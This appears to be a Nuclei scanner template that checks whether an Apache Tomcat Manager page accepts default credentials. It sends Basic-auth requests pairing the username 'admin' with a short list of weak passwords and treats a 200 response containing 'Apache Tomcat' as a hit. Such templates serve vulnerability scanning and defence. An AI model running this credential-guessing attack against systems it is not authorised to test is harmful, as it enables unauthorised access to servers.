id: tomcat-manager-default
info:
  name: tomcat-manager-default-password
  author: pdteam
  severity: high

requests:

  - payloads:
      username:
        - admin

      password:
        - admin
        - guest
        - password
        - test
        - 12345
        - 123456

    attack: clusterbomb  # Available options: sniper, pitchfork and clusterbomb

    raw:
      # Request with simple param and header manipulation with DSL functions
      - |
        GET /manager/html HTTP/1.1
        Host: {{Hostname}}
        Authorization: Basic {{base64('§username§:§password§')}}
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0
        Accept-Language: en-US,en;q=0.9
        Connection: close

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - Apache Tomcat